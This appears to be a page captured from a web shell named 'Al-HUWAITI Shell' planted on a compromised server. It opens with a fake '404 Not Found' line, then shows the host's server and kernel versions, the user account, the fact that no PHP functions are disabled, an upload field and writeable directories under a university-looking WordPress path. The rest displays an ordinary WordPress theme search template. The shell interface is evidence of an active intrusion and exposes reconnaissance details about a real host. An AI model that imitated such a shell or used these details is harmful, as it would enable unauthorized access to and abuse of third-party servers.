hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache/2.4.52 (Ubuntu)
System : Linux HAN2 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : servadmin ( 1000)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
Directory :  /www/docs/home.obu.edu.bak/wp-content/themes/ConstitutionDay/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /www/docs/home.obu.edu.bak/wp-content/themes/ConstitutionDay/search.php
<?php get_header(); ?>

	<?php if (have_posts()) : ?>

				<h1>Search Results</h1>

				<p class="title-description">Content matching &quot;<?php the_search_query() ?>&quot;.</p>

				<div class="pagination pagination-top">

					<div class="left"><?php next_posts_link('&laquo; Older Entries') ?></div>
					<div class="right"><?php previous_posts_link('Newer Entries &raquo;') ?></div>
					
					<div class="clearer">&nbsp;</div>

				</div>

		<?php while (have_posts()) : the_post(); ?>
				<div class="post">

					<div class="post-title" id="post-<?php the_ID(); ?>">
						<h2><a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></h2>
					</div>

					<div class="post-date">
						<div class="left"><?php the_time('F jS, Y') ?> in <?php the_category(' / ', 'multiple') ?><?php edit_post_link('Edit', ' <span class="text-separator">|</span> ', ''); ?></div>
						<div class="right"><?php comments_popup_link('No Comments &#187;', '1 Comment &#187;', '% Comments &#187;'); ?></div>
						<div class="clearer">&nbsp;</div>
					</div>

					<div class="post-body">

						<?php the_excerpt(); ?>
						<div class="clearer">&nbsp;</div>

					</div>

				</div>

				<div class="archive-separator"></div>

		<?php endwhile; ?>

				<div class="pagination pagination-bottom">

					<div class="left"><?php next_posts_link('&laquo; Older Entries') ?></div>
					<div class="right"><?php previous_posts_link('Newer Entries &raquo;') ?></div>
					
					<div class="clearer">&nbsp;</div>

				</div>

	<?php else : ?>

			<h2>No content found. Try a different search?</h2>

	<?php endif; ?>

		<?php get_sidebar(); ?>

<?php get_footer(); ?>

Al-HUWAITI Shell